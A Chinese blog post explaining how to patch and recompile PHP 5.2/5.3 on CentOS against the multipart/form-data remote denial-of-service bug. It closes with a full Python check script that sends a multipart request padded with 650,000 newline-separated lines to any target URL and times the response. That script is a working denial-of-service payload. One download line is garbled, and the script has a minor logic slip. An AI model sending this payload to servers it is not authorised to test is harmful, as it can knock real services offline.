php中Multipart/form-data漏洞补丁修复

今天在乌云上看到PHP multipart/form-data 远程DOS漏洞,马上给同事联系了下对线上服务器进行打补丁,先给一个centos编译安装nginx+php-fpm+mysql的教程,如果是根据我这样安装的话,那你们可以继续按照做下去了,如果不是的话,那么你们就看看吧.

系统:centos 5.x(64位)

需要的软件:php-5.2-multipart-form-data.patch

1.查看自己php版本

  1. php -v
  2. PHP 5.2.17p1 (cli) (built: Oct 29 2015 15:31:06)
  3. Copyright (c) 1997-2010 The PHP Group
  4. Zend Engine v2.2.0, Copyright (c) 1998-2010 Zend Technologies

如果版本高于5.3的话,那就直接升级php就可以了.

2.下载补丁文件

  1. wget http://soft.vpser.net/web/php/bug/php-5.2-multipart-form-data.patch
  2. //或
  3. wget/php_patch/php-5.2-multipart-form-data.patch

3.安装补丁

  1. 5.2:
  2. cp php-5.2-multipart-form-data.patch ~/install/php-5.2.17/
  3. cd php-5.2.17
  4. patch -p1 < php-5.2-multipart-form-data.patch
  5. 5.3:
  6. wget http://soft.vpser.net/web/php/bug/php-5.3-multipart-form-data.patch
  7. patch -p1 < php-5.3-multipart-form-data.patch

将42行到45行删除:

  1. if [ “$php_version” == “$old_php_version” ]; then
  2. echo “Error: The upgrade PHP Version is the same as the old Version!!”
  3. exit 1
  4. fi

4.重新对php进行编译

  1. ./configure --prefix=/usr/local/php --enable-fastcgi --enable-fpm --with-fpm-log=/var/log/php-fpm.log \
  2. --with-fpm-conf=/etc/php-fpm.conf --with-fpm-pid=/var/run/php-fpm.pid --with-config-file-path=/etc \
  3. --with-config-file-scan-dir=/etc/php.d --with-openssl --with-zlib --enable-bcmath --with-bz2 --with-curl \
  4. --enable-ftp --with-gd --enable-gd-native-ttf --with-jpeg-dir --with-png-dir --with-gettext --with-mhash \
  5. --enable-mbstring --with-mcrypt --enable-soap --enable-zip --with-iconv=/usr/local/libiconv \
  6. --with-mysql=/usr/local/mysql --with-mysqli=/usr/local/mysql/bin/mysql_config --without-pear

PS:你们最好自己查看下自己php的编译参数,php -i|grep configure

make && make install

好了,这样就把漏洞整好了,怎么检测呢?请看下面这个脚本:

  1. cat dd.py
  2. '''
  3. Author: Shusheng Liu,The Department of Security Cloud, Baidu
  4. email: liusscs@163.com
  5. '''
  6. import sys
  7. import urllib,urllib2
  8. import datetime
  9. from optparse import OptionParser
  10. def http_proxy(proxy_url):
  11. proxy_handler = urllib2.ProxyHandler({"http" : proxy_url})
  12. null_proxy_handler = urllib2.ProxyHandler({})
  13. opener = urllib2.build_opener(proxy_handler)
  14. urllib2.install_opener(opener)
  15. #end http_proxy
  16. def check_php_multipartform_dos(url,post_body,headers):
  17. req = urllib2.Request(url)
  18. for key in headers.keys():
  19. req.add_header(key,headers[key])
  20. starttime = datetime.datetime.now();
  21. fd = urllib2.urlopen(req,post_body)
  22. html = fd.read()
  23. endtime = datetime.datetime.now()
  24. usetime=(endtime - starttime).seconds
  25. if(usetime > 5):
  26. result = url+" is vulnerable";
  27. else:
  28. if(usetime > 3):
  29. result = "need to check normal respond time"
  30. return [result,usetime]
  31. #end
  32. def main():
  33. #http_proxy("http://127.0.0.1:8089")
  34. parser = OptionParser()
  35. parser.add_option("-t", "--target", action="store",
  36. dest="target",
  37. default=False,
  38. type="string",
  39. help="test target")
  40. (options, args) = parser.parse_args()
  41. if(options.target):
  42. target = options.target
  43. else:
  44. return;
  45. Num=650000
  46. headers={'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryX3B7rDMPcQlzmJE1',
  47. 'Accept-Encoding':'gzip, deflate',
  48. 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36'}
  49. body = "------WebKitFormBoundaryX3B7rDMPcQlzmJE1\nContent-Disposition: form-data; name=\"file\"; filename=sp.jpg"
  50. payload=""
  51. for i in range(0,Num):
  52. payload = payload + "a\n"
  53. body = body + payload;
  54. body = body + "Content-Type: application/octet-stream\r\n\r\ndatadata\r\n------WebKitFormBoundaryX3B7rDMPcQlzmJE1--"
  55. print "starting...";
  56. respond=check_php_multipartform_dos(target,body,headers)
  57. print "Result : "
  58. print respond[0]
  59. print "Respond time : "+str(respond[1]) + " seconds";
  60. if __name__=="__main__":
  61. main()
本脚本用来检测的,如果拿去做坏事的话,跟本站无关.